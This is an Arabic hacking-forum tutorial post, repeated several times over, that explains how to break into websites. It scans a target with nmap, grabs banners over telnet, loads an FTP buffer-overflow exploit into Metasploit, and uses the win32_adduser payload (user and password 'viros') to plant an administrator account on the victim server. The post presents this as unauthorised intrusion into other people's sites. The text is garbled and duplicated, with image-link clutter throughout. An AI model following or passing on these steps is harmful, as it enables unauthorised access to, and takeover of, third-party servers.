سسويلم
08-16-2010, 05:15 PM
شرح الأختراق المتقدم + استعمال اداة الميتا سبليوت (http://www.usp4.net/vb/t4480/)
بسم الله الرحمن الرحيم
السلام عليكم و رحمة الله و بركاته
أقدم لكم شرح الاختراق المتقدم
و هي طريقة الأختراق (http://www.usp4.net/vb/t4480/) الأحترافيه
طبعا الكثير منا واجه بعض المشاكل و هو أنه لما يفحص السيرفر و الموقع و ما يلقى ثغرات انكلود او كوماند.....
و بعض الشباب بترك الموقع و يمل من البحث و ما يكون عنده علم بالطرق الثانيه
و اللي منها طريقتنا اليوم و هي الأختراق (http://www.usp4.net/vb/t4480/) عن طريق البرامج المركبه على السيرفر أو الموقع
حاولت أسهل المسأله و اصغر الشرح بقدر المستطاع
ول من لم يظهر له الشرح فليحمله من هنا :
تحميل الشرح مع الصور بصيغة HTML (http://www.usp4.net/redirector.php/redirector.php?url=%61%48%52%30%63%44%6f%76%4c%33% 64%33%64%79%35%6d%63%6d%56%6c%64%32%56%69%64%47%39 %33%62%69%35%6a%62%32%30%76%62%54%4e%79%5a%57%5a%6 f%62%33%41%76%62%6d%31%68%63%43%30%77%4c%6e%70%70% 63%41%3d%3d)
اللي راح تتعلمه من الشرح:-
1-استخدام أداة Nmap الشهيره.
2-التعامل مع أداة M e t a s ploit.
3-استغلال ثغرات Buffer Overflow المكتوبه بلغة الميتا.
متطلبات الشرح:-
1-أداة Nmap
2-أداة M e t a spliot
لا أحد يطلب مني رابط التحميل للادوات أبحتوا عنها في مواقع البحت
نبدأ الشرح على بركة الله
http://www.vbspiders.com/imagesup/nmap1.jpg
أمر البحث
nmap -P0 http://www.site.com/ (http://www.usp4.net/redirector.php/redirector.php?url=%61%48%52%30%63%44%6f%76%4c%33% 64%33%64%79%35%7a%61%58%52%6c%4c%6d%4e%76%62%53%38 %3d)
مع وضع رابط الموقع المراد اختراقه بدل http://www.site.com/ (http://www.usp4.net/redirector.php/redirector.php?url=%61%48%52%30%63%44%6f%76%4c%33% 64%33%64%79%35%7a%61%58%52%6c%4c%6d%4e%76%62%53%38 %3d)
و زي ما نشوف البرامج المركبه على الموقع مع المنافذ
الحين نروح للتلنت ((غير مهم جدا و لكن لزيادة فرصه نجاح الثغره))
ابدأ=>تشغيل=>telnet
http://www.vbspiders.com/imagesup/nmap2.jpg
نكتب أول شئ حرف o و انتر و بعدها نكتب الموقع و المنفذ مثل: site.com 21
21 منفذ الــFTP
http://www.vbspiders.com/imagesup/nmap3.jpg
هنا طلع لنا اسم البرنامج
الحين نروح نبحث عن ثغرات للبرنامج عن طريق محرك البحث بهذه الطريقه
FTP port 21 Buffer Overflow Exploit
و ممكن تزود بالاخير و تحط كلمة M e t a بدون فراغات علشان أنا ما راح اشرح استغلال الثغرات هاذي الا اللي بالميتا
بعد ما نلقى الثغره نحفظها بس مو باي اسم تبغاه شوفوا الصوره
http://www.vbspiders.com/imagesup/nmap4.jpg
هذا الأسم اللي تحفظ الثغره فيه و بامتداد pm
تاخذ الثغره للمسار هذا
C:\Program Files\M e t a sploit\Framework2\home\framework\exploits
و تروح الأن و تفتح أداة الميتا (http://www.usp4.net/vb/t4480/) بالذهاب للمكان اللي ثبت الاداة فيه
راح تلقاها باسم msfconsole.exe
http://www.vbspiders.com/imagesup/nmap5.jpg
show exploits امر اظهار الثغرات الموجوده و راح تلاحظ الثغرات كثيره و هي طبعا ثغرات محفوظه مع البرنامج
http://www.vbspiders.com/imagesup/nmap6.jpg
http://www.vbspiders.com/imagesup/nmap7.jpg
use تظيف بعده اسم الثغره اللي معك (هذا أمر استخدام الثغره اللي تحددها انت)
http://www.vbspiders.com/imagesup/nmap8.jpg
show options أمر اظهار الخيارات
RHOST = الموقع
RPORT = المنفذ
أهم شئ هو الموقع أما المنفذ ماهو لازم
http://www.vbspiders.com/imagesup/nmap9.jpg
set RHOST http://www.site.com/ (http://www.usp4.net/redirector.php/redirector.php?url=%61%48%52%30%63%44%6f%76%4c%33% 64%33%64%79%35%7a%61%58%52%6c%4c%6d%4e%76%62%53%38 %3d) امر اظافة الموقع
و نفس الشئ للمنفذ مع تعديل RHOST الى RPORT و تغيير الموقع الى المنفذ
http://www.vbspiders.com/imagesup/nmap6.jpg
http://www.vbspiders.com/imagesup/nmap7.jpg
use تظيف بعده اسم الثغره اللي معك (هذا أمر استخدام الثغره اللي تحددها انت)
http://www.vbspiders.com/imagesup/nmap8.jpg
show options أمر اظهار الخيارات
RHOST = الموقع
RPORT = المنفذ
أهم شئ هو الموقع أما المنفذ ماهو لازم
http://www.vbspiders.com/imagesup/nmap9.jpg
set RHOST http://www.site.com/ (http://www.usp4.net/redirector.php/redirector.php?url=%61%48%52%30%63%44%6f%76%4c%33% 64%33%64%79%35%7a%61%58%52%6c%4c%6d%4e%76%62%53%38 %3d) امر اظافة الموقع
و نفس الشئ للمنفذ مع تعديل RHOST الى RPORT و تغيير الموقع الى المنفذ
http://www.vbspiders.com/imagesup/nmap10.jpg
show payloads أمر اظهار خيارات الثغره أو الأشياء اللي ممكن تنفذها الثغره
و أهم شئ هو win32_adduser و هي لاضافة حساب رووت على السيرفر و هذا اللي راح اشرحه
http://www.vbspiders.com/imagesup/nmap11.jpg
set PAYLOAD win32_adduser أمر استخدام هذا الخيار للثغره
الحين لو تبي تشوف الخيارات show option راح تلقى انضاف أمر الثغره لأضافة حساب الرووت لكن مكان اليوزر و الباس فاضي نضيف اليوزر و الباس بالأوامر هاذي
set PASS viros اضافة الباسوورد viros
set USER viros اضافة اليوزر viros
http://www.vbspiders.com/vb/images/icons/8.gif شرح الأختراق (http://www.usp4.net/vb/t4480/) المتقدم (http://www.usp4.net/vb/t4480/) + استعمال (http://www.usp4.net/vb/t4480/) اداة (http://www.usp4.net/vb/t4480/) الميتا (http://www.usp4.net/vb/t4480/) سبليوت
بسم الله الرحمن الرحيم
السلام عليكم و رحمة الله و بركاته
أقدم لكم شرح الاختراق المتقدم
و هي طريقة الأختراق (http://www.usp4.net/vb/t4480/) الأحترافيه
طبعا الكثير منا واجه بعض المشاكل و هو أنه لما يفحص السيرفر و الموقع و ما يلقى ثغرات انكلود او كوماند.....
و بعض الشباب بترك الموقع و يمل من البحث و ما يكون عنده علم بالطرق الثانيه
و اللي منها طريقتنا اليوم و هي الأختراق (http://www.usp4.net/vb/t4480/) عن طريق البرامج المركبه على السيرفر أو الموقع
حاولت أسهل المسأله و اصغر الشرح بقدر المستطاع
ول من لم يظهر له الشرح فليحمله من هنا :
تحميل الشرح مع الصور بصيغة HTML (http://www.usp4.net/redirector.php/redirector.php?url=%61%48%52%30%63%44%6f%76%4c%33% 64%33%64%79%35%6d%63%6d%56%6c%64%32%56%69%64%47%39 %33%62%69%35%6a%62%32%30%76%62%54%4e%79%5a%57%5a%6 f%62%33%41%76%62%6d%31%68%63%43%30%77%4c%6e%70%70% 63%41%3d%3d)
اللي راح تتعلمه من الشرح:-
1-استخدام أداة Nmap الشهيره.
2-التعامل مع أداة M e t a s ploit.
3-استغلال ثغرات Buffer Overflow المكتوبه بلغة الميتا.
متطلبات الشرح:-
1-أداة Nmap
2-أداة M e t a spliot
لا أحد يطلب مني رابط التحميل للادوات أبحتوا عنها في مواقع البحت
نبدأ الشرح على بركة الله
http://www.vbspiders.com/vb/images/statusicon/wol_error.gifأضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 642x463 وحجمها 60KB.http://www.vbspiders.com/imagesup/nmap1.jpg
أمر البحث
nmap -P0 http://www.site.com/ (http://www.usp4.net/redirector.php/redirector.php?url=%61%48%52%30%63%44%6f%76%4c%33% 64%33%64%79%35%7a%61%58%52%6c%4c%6d%4e%76%62%53%38 %3d)
مع وضع رابط الموقع المراد اختراقه بدل http://www.site.com/ (http://www.usp4.net/redirector.php/redirector.php?url=%61%48%52%30%63%44%6f%76%4c%33% 64%33%64%79%35%7a%61%58%52%6c%4c%6d%4e%76%62%53%38 %3d)
و زي ما نشوف البرامج المركبه على الموقع مع المنافذ
الحين نروح للتلنت ((غير مهم جدا و لكن لزيادة فرصه نجاح الثغره))
ابدأ=>تشغيل=>telnet
http://www.vbspiders.com/imagesup/nmap2.jpg
نكتب أول شئ حرف o و انتر و بعدها نكتب الموقع و المنفذ مثل: site.com 21
21 منفذ الــFTP
http://www.vbspiders.com/imagesup/nmap3.jpg
هنا طلع لنا اسم البرنامج
الحين نروح نبحث عن ثغرات للبرنامج عن طريق محرك البحث بهذه الطريقه
FTP port 21 Buffer Overflow Exploit
و ممكن تزود بالاخير و تحط كلمة M e t a بدون فراغات علشان أنا ما راح اشرح استغلال الثغرات هاذي الا اللي بالميتا
بعد ما نلقى الثغره نحفظها بس مو باي اسم تبغاه شوفوا الصوره
http://www.vbspiders.com/imagesup/nmap4.jpg
هذا الأسم اللي تحفظ الثغره فيه و بامتداد pm
تاخذ الثغره للمسار هذا
C:\Program Files\M e t a sploit\Framework2\home\framework\exploits
و تروح الأن و تفتح أداة الميتا (http://www.usp4.net/vb/t4480/) بالذهاب للمكان اللي ثبت الاداة فيه
راح تلقاها باسم msfconsole.exe
http://www.vbspiders.com/imagesup/nmap5.jpg
show exploits امر اظهار الثغرات الموجوده و راح تلاحظ الثغرات كثيره و هي طبعا ثغرات محفوظه مع البرنامج
http://www.vbspiders.com/vb/images/statusicon/wol_error.gifأضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 756x321 وحجمها 68KB.http://www.vbspiders.com/imagesup/nmap6.jpg
http://www.vbspiders.com/imagesup/nmap7.jpg
use تظيف بعده اسم الثغره اللي معك (هذا أمر استخدام الثغره اللي تحددها انت)
http://www.vbspiders.com/imagesup/nmap8.jpg
show options أمر اظهار الخيارات
RHOST = الموقع
RPORT = المنفذ
أهم شئ هو الموقع أما المنفذ ماهو لازم
http://www.vbspiders.com/imagesup/nmap9.jpg
set RHOST http://www.site.com/ (http://www.usp4.net/redirector.php/redirector.php?url=%61%48%52%30%63%44%6f%76%4c%33% 64%33%64%79%35%7a%61%58%52%6c%4c%6d%4e%76%62%53%38 %3d) امر اظافة الموقع
و نفس الشئ للمنفذ مع تعديل RHOST الى RPORT و تغيير الموقع الى المنفذ
http://www.vbspiders.com/vb/images/statusicon/wol_error.gifأضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 657x285 وحجمها 57KB.http://www.vbspiders.com/imagesup/nmap10.jpg
show payloads أمر اظهار خيارات الثغره أو الأشياء اللي ممكن تنفذها الثغره
و أهم شئ هو win32_adduser و هي لاضافة حساب رووت على السيرفر و هذا اللي راح اشرحه
http://www.vbspiders.com/imagesup/nmap11.jpg
set PAYLOAD win32_adduser أمر استخدام هذا الخيار للثغره
الحين لو تبي تشوف الخيارات show option راح تلقى انضاف أمر الثغره لأضافة حساب الرووت لكن مكان اليوزر و الباس فاضي نضيف اليوزر و الباس بالأوامر هاذي
set PASS viros اضافة الباسوورد viros
set USER viros اضافة اليوزر viros
http://www.vbspiders.com/vb/images/statusicon/wol_error.gifأضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 680x268 وحجمها 40KB.http://www.vbspiders.com/imagesup/nmap12.jpg
اظهار الخيارات و راح نشوف ان المعلومات انحفظت
http://www.vbspiders.com/imagesup/nmap13.jpg
exploit أمر الأستغلال و زي ما راح تشوفون ان فيه كلام راح يطلع زي اللي بالصوره و ان شاء الهل الثغره تظبط
و بعد ما ينسجل حساب الرووت تروح تتصل بالسيرفر بأي برنامج اتصال زي برنامج putty سوف يتم شرحه باذن الله
========================
و الى هنا نكون وصلنا لنهاية الشرح
أتمنى ان الشرح كان واضح
و اذا فيه أي خطأ سامحوني عليه لان الأنسان غير معصوم من الخطأ
و في الختام تقبلوا تحياتي
بسم الله الرحمن الرحيم
السلام عليكم و رحمة الله و بركاته
أقدم لكم شرح الاختراق المتقدم
و هي طريقة الأختراق (http://www.usp4.net/vb/t4480/) الأحترافيه
طبعا الكثير منا واجه بعض المشاكل و هو أنه لما يفحص السيرفر و الموقع و ما يلقى ثغرات انكلود او كوماند.....
و بعض الشباب بترك الموقع و يمل من البحث و ما يكون عنده علم بالطرق الثانيه
و اللي منها طريقتنا اليوم و هي الأختراق (http://www.usp4.net/vb/t4480/) عن طريق البرامج المركبه على السيرفر أو الموقع
حاولت أسهل المسأله و اصغر الشرح بقدر المستطاع
ول من لم يظهر له الشرح فليحمله من هنا :
تحميل الشرح مع الصور بصيغة HTML (http://www.usp4.net/redirector.php/redirector.php?url=%61%48%52%30%63%44%6f%76%4c%33% 64%33%64%79%35%6d%63%6d%56%6c%64%32%56%69%64%47%39 %33%62%69%35%6a%62%32%30%76%62%54%4e%79%5a%57%5a%6 f%62%33%41%76%62%6d%31%68%63%43%30%77%4c%6e%70%70% 63%41%3d%3d)
اللي راح تتعلمه من الشرح:-
1-استخدام أداة Nmap الشهيره.
2-التعامل مع أداة M e t a s ploit.
3-استغلال ثغرات Buffer Overflow المكتوبه بلغة الميتا.
متطلبات الشرح:-
1-أداة Nmap
2-أداة M e t a spliot
لا أحد يطلب مني رابط التحميل للادوات أبحتوا عنها في مواقع البحت
نبدأ الشرح على بركة الله
http://www.vbspiders.com/imagesup/nmap1.jpg
أمر البحث
nmap -P0 http://www.site.com/ (http://www.usp4.net/redirector.php/redirector.php?url=%61%48%52%30%63%44%6f%76%4c%33% 64%33%64%79%35%7a%61%58%52%6c%4c%6d%4e%76%62%53%38 %3d)
مع وضع رابط الموقع المراد اختراقه بدل http://www.site.com/ (http://www.usp4.net/redirector.php/redirector.php?url=%61%48%52%30%63%44%6f%76%4c%33% 64%33%64%79%35%7a%61%58%52%6c%4c%6d%4e%76%62%53%38 %3d)
و زي ما نشوف البرامج المركبه على الموقع مع المنافذ
الحين نروح للتلنت ((غير مهم جدا و لكن لزيادة فرصه نجاح الثغره))
ابدأ=>تشغيل=>telnet
http://www.vbspiders.com/imagesup/nmap2.jpg
نكتب أول شئ حرف o و انتر و بعدها نكتب الموقع و المنفذ مثل: site.com 21
21 منفذ الــFTP
http://www.vbspiders.com/imagesup/nmap3.jpg
هنا طلع لنا اسم البرنامج
الحين نروح نبحث عن ثغرات للبرنامج عن طريق محرك البحث بهذه الطريقه
FTP port 21 Buffer Overflow Exploit
و ممكن تزود بالاخير و تحط كلمة M e t a بدون فراغات علشان أنا ما راح اشرح استغلال الثغرات هاذي الا اللي بالميتا
بعد ما نلقى الثغره نحفظها بس مو باي اسم تبغاه شوفوا الصوره
http://www.vbspiders.com/imagesup/nmap4.jpg
هذا الأسم اللي تحفظ الثغره فيه و بامتداد pm
تاخذ الثغره للمسار هذا
C:\Program Files\M e t a sploit\Framework2\home\framework\exploits
و تروح الأن و تفتح أداة الميتا (http://www.usp4.net/vb/t4480/) بالذهاب للمكان اللي ثبت الاداة فيه
راح تلقاها باسم msfconsole.exe
http://www.vbspiders.com/imagesup/nmap5.jpg
show exploits امر اظهار الثغرات الموجوده و راح تلاحظ الثغرات كثيره و هي طبعا ثغرات محفوظه مع البرنامج
http://www.vbspiders.com/imagesup/nmap6.jpg
http://www.vbspiders.com/imagesup/nmap7.jpg
use تظيف بعده اسم الثغره اللي معك (هذا أمر استخدام الثغره اللي تحددها انت)
http://www.vbspiders.com/imagesup/nmap8.jpg
show options أمر اظهار الخيارات
RHOST = الموقع
RPORT = المنفذ
أهم شئ هو الموقع أما المنفذ ماهو لازم
http://www.vbspiders.com/imagesup/nmap9.jpg
set RHOST http://www.site.com/ (http://www.usp4.net/redirector.php/redirector.php?url=%61%48%52%30%63%44%6f%76%4c%33% 64%33%64%79%35%7a%61%58%52%6c%4c%6d%4e%76%62%53%38 %3d) امر اظافة الموقع
و نفس الشئ للمنفذ مع تعديل RHOST الى RPORT و تغيير الموقع الى المنفذ
http://www.vbspiders.com/imagesup/nmap6.jpg
http://www.vbspiders.com/imagesup/nmap7.jpg
use تظيف بعده اسم الثغره اللي معك (هذا أمر استخدام الثغره اللي تحددها انت)
http://www.vbspiders.com/imagesup/nmap8.jpg
show options أمر اظهار الخيارات
RHOST = الموقع
RPORT = المنفذ
أهم شئ هو الموقع أما المنفذ ماهو لازم
http://www.vbspiders.com/imagesup/nmap9.jpg
set RHOST http://www.site.com/ (http://www.usp4.net/redirector.php/redirector.php?url=%61%48%52%30%63%44%6f%76%4c%33% 64%33%64%79%35%7a%61%58%52%6c%4c%6d%4e%76%62%53%38 %3d) امر اظافة الموقع
و نفس الشئ للمنفذ مع تعديل RHOST الى RPORT و تغيير الموقع الى المنفذ
http://www.vbspiders.com/imagesup/nmap10.jpg
show payloads أمر اظهار خيارات الثغره أو الأشياء اللي ممكن تنفذها الثغره
و أهم شئ هو win32_adduser و هي لاضافة حساب رووت على السيرفر و هذا اللي راح اشرحه
http://www.vbspiders.com/imagesup/nmap11.jpg
set PAYLOAD win32_adduser أمر استخدام هذا الخيار للثغره
الحين لو تبي تشوف الخيارات show option راح تلقى انضاف أمر الثغره لأضافة حساب الرووت لكن مكان اليوزر و الباس فاضي نضيف اليوزر و الباس بالأوامر هاذي
set PASS viros اضافة الباسوورد viros
set USER viros اضافة اليوزر viros
http://www.vbspiders.com/vb/images/icons/8.gif شرح الأختراق (http://www.usp4.net/vb/t4480/) المتقدم (http://www.usp4.net/vb/t4480/) + استعمال (http://www.usp4.net/vb/t4480/) اداة (http://www.usp4.net/vb/t4480/) الميتا (http://www.usp4.net/vb/t4480/) سبليوت
بسم الله الرحمن الرحيم
السلام عليكم و رحمة الله و بركاته
أقدم لكم شرح الاختراق المتقدم
و هي طريقة الأختراق (http://www.usp4.net/vb/t4480/) الأحترافيه
طبعا الكثير منا واجه بعض المشاكل و هو أنه لما يفحص السيرفر و الموقع و ما يلقى ثغرات انكلود او كوماند.....
و بعض الشباب بترك الموقع و يمل من البحث و ما يكون عنده علم بالطرق الثانيه
و اللي منها طريقتنا اليوم و هي الأختراق (http://www.usp4.net/vb/t4480/) عن طريق البرامج المركبه على السيرفر أو الموقع
حاولت أسهل المسأله و اصغر الشرح بقدر المستطاع
ول من لم يظهر له الشرح فليحمله من هنا :
تحميل الشرح مع الصور بصيغة HTML (http://www.usp4.net/redirector.php/redirector.php?url=%61%48%52%30%63%44%6f%76%4c%33% 64%33%64%79%35%6d%63%6d%56%6c%64%32%56%69%64%47%39 %33%62%69%35%6a%62%32%30%76%62%54%4e%79%5a%57%5a%6 f%62%33%41%76%62%6d%31%68%63%43%30%77%4c%6e%70%70% 63%41%3d%3d)
اللي راح تتعلمه من الشرح:-
1-استخدام أداة Nmap الشهيره.
2-التعامل مع أداة M e t a s ploit.
3-استغلال ثغرات Buffer Overflow المكتوبه بلغة الميتا.
متطلبات الشرح:-
1-أداة Nmap
2-أداة M e t a spliot
لا أحد يطلب مني رابط التحميل للادوات أبحتوا عنها في مواقع البحت
نبدأ الشرح على بركة الله
http://www.vbspiders.com/vb/images/statusicon/wol_error.gifأضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 642x463 وحجمها 60KB.http://www.vbspiders.com/imagesup/nmap1.jpg
أمر البحث
nmap -P0 http://www.site.com/ (http://www.usp4.net/redirector.php/redirector.php?url=%61%48%52%30%63%44%6f%76%4c%33% 64%33%64%79%35%7a%61%58%52%6c%4c%6d%4e%76%62%53%38 %3d)
مع وضع رابط الموقع المراد اختراقه بدل http://www.site.com/ (http://www.usp4.net/redirector.php/redirector.php?url=%61%48%52%30%63%44%6f%76%4c%33% 64%33%64%79%35%7a%61%58%52%6c%4c%6d%4e%76%62%53%38 %3d)
و زي ما نشوف البرامج المركبه على الموقع مع المنافذ
الحين نروح للتلنت ((غير مهم جدا و لكن لزيادة فرصه نجاح الثغره))
ابدأ=>تشغيل=>telnet
http://www.vbspiders.com/imagesup/nmap2.jpg
نكتب أول شئ حرف o و انتر و بعدها نكتب الموقع و المنفذ مثل: site.com 21
21 منفذ الــFTP
http://www.vbspiders.com/imagesup/nmap3.jpg
هنا طلع لنا اسم البرنامج
الحين نروح نبحث عن ثغرات للبرنامج عن طريق محرك البحث بهذه الطريقه
FTP port 21 Buffer Overflow Exploit
و ممكن تزود بالاخير و تحط كلمة M e t a بدون فراغات علشان أنا ما راح اشرح استغلال الثغرات هاذي الا اللي بالميتا
بعد ما نلقى الثغره نحفظها بس مو باي اسم تبغاه شوفوا الصوره
http://www.vbspiders.com/imagesup/nmap4.jpg
هذا الأسم اللي تحفظ الثغره فيه و بامتداد pm
تاخذ الثغره للمسار هذا
C:\Program Files\M e t a sploit\Framework2\home\framework\exploits
و تروح الأن و تفتح أداة الميتا (http://www.usp4.net/vb/t4480/) بالذهاب للمكان اللي ثبت الاداة فيه
راح تلقاها باسم msfconsole.exe
http://www.vbspiders.com/imagesup/nmap5.jpg
show exploits امر اظهار الثغرات الموجوده و راح تلاحظ الثغرات كثيره و هي طبعا ثغرات محفوظه مع البرنامج
http://www.vbspiders.com/vb/images/statusicon/wol_error.gifأضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 756x321 وحجمها 68KB.http://www.vbspiders.com/imagesup/nmap6.jpg
http://www.vbspiders.com/imagesup/nmap7.jpg
use تظيف بعده اسم الثغره اللي معك (هذا أمر استخدام الثغره اللي تحددها انت)
http://www.vbspiders.com/imagesup/nmap8.jpg
show options أمر اظهار الخيارات
RHOST = الموقع
RPORT = المنفذ
أهم شئ هو الموقع أما المنفذ ماهو لازم
http://www.vbspiders.com/imagesup/nmap9.jpg
set RHOST http://www.site.com/ (http://www.usp4.net/redirector.php/redirector.php?url=%61%48%52%30%63%44%6f%76%4c%33% 64%33%64%79%35%7a%61%58%52%6c%4c%6d%4e%76%62%53%38 %3d) امر اظافة الموقع
و نفس الشئ للمنفذ مع تعديل RHOST الى RPORT و تغيير الموقع الى المنفذ
http://www.vbspiders.com/vb/images/statusicon/wol_error.gifأضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 657x285 وحجمها 57KB.http://www.vbspiders.com/imagesup/nmap10.jpg
show payloads أمر اظهار خيارات الثغره أو الأشياء اللي ممكن تنفذها الثغره
و أهم شئ هو win32_adduser و هي لاضافة حساب رووت على السيرفر و هذا اللي راح اشرحه
http://www.vbspiders.com/imagesup/nmap11.jpg
set PAYLOAD win32_adduser أمر استخدام هذا الخيار للثغره
الحين لو تبي تشوف الخيارات show option راح تلقى انضاف أمر الثغره لأضافة حساب الرووت لكن مكان اليوزر و الباس فاضي نضيف اليوزر و الباس بالأوامر هاذي
set PASS viros اضافة الباسوورد viros
set USER viros اضافة اليوزر viros
http://www.vbspiders.com/vb/images/statusicon/wol_error.gifأضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 680x268 وحجمها 40KB.http://www.vbspiders.com/imagesup/nmap12.jpg
اظهار الخيارات و راح نشوف ان المعلومات انحفظت
http://www.vbspiders.com/imagesup/nmap13.jpg
exploit أمر الأستغلال و زي ما راح تشوفون ان فيه كلام راح يطلع زي اللي بالصوره و ان شاء الهل الثغره تظبط
و بعد ما ينسجل حساب الرووت تروح تتصل بالسيرفر بأي برنامج اتصال زي برنامج putty سوف يتم شرحه باذن الله
========================
و الى هنا نكون وصلنا لنهاية الشرح
أتمنى ان الشرح كان واضح
و اذا فيه أي خطأ سامحوني عليه لان الأنسان غير معصوم من الخطأ
و في الختام تقبلوا تحياتي